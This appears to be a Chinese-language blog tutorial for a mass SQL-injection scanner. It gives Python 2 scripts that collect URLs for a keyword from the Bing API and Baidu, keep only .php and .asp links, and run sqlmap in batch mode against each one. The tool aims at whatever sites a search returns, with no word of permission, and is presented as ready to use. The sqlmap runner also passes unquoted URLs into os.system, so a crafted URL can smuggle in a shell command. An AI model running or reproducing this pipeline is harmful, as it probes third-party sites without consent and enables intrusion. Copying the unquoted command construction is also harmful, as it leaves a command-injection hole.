思路 :
利用现有的搜索引擎API以及GoogleHacking技术 , 批量进行关键字查询和注入点检测
分为三步 :
- URL采集
- 对采集到的不可能的URL进行过滤 , 例如静态的页面等
- 注入点检测
参考资料 :
实现 :
URL采集 :
- 利用Bing提供的免费API , 进行URL采集 : (Bing.py)
#!/usr/bin/env python
#coding:utf8
import requests
import json
import sys
# config-start
BingKey = "" # config your bing Ocp-Apim-Subscription-Key
Keyword = "简书"
maxPageNumber = 10
pageSize = 10
# config-end
url = "https://api.cognitive.microsoft.com/bing/v5.0/search?q=" + Keyword
headers = {
'Host':'api.cognitive.microsoft.com',
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
'Accept-Encoding':'gzip, deflate, br',
'Ocp-Apim-Subscription-Key':BingKey,
'Upgrade-Insecure-Requests':'1',
'Referer':'https://api.cognitive.microsoft.com/bing/v5.0/search?q=opensns',
'Connection':'keep-alive',
}
for i in range(maxPageNumber):
tempUrl = url + "&offset=" + str(i * pageSize) + "&count=" + str(pageSize)
response = requests.get(tempUrl, headers=headers)
content = response.text
jsonObject = json.loads(content)
results = jsonObject['webPages']['value']
for result in results:
resulturl = result['displayUrl']
if resulturl.startswith("https://"):
print resulturl
else:
print "http://" + resulturl
- 利用开源HTML解析库对百度搜索结果页面进行解析 , 采集URL : (Baidu.py)
#!/usr/bin/env python
#coding:utf8
import requests
from bs4 import BeautifulSoup
import sys
# config-start
keyword = "简书"
# config-end
url = "http://www.baidu.com/s?wd=" + keyword
response = requests.get(url)
content = response.content
status_code = response.status_code
soup = BeautifulSoup(content, "html.parser")
links = soup.findAll("a")
for link in links:
try:
dstURL = link['href']
if (dstURL.startswith("http://") or dstURL.startswith("https://")) and dstURL.startswith("http://www.baidu.com/link?url=") :
result_url = requests.get(dstURL).url
print result_url
except Exception as e:
continue
对静态页面等URL进行过滤
#!/usr/bin/env python
#coding:utf8
file = open("urls.txt","r")
for line in file:
content = line[0:-1]
if content.endswith("html"):
continue
if content.endswith("htm"):
continue
if ".php" in content or ".asp" in content:
print content
检测注入点 :
#!/usr/bin/env python
#coding:utf8
import os
import sys
file = open(sys.argv[1],"r")
for line in file:
url = line[0:-1]
print "*******************"
command = "sqlmap.py -u " + url + " --random-agent -f --batch --answer=\"extending=N,follow=N,keep=N,exploit=n\""
print "Exec : " + command
os.system(command)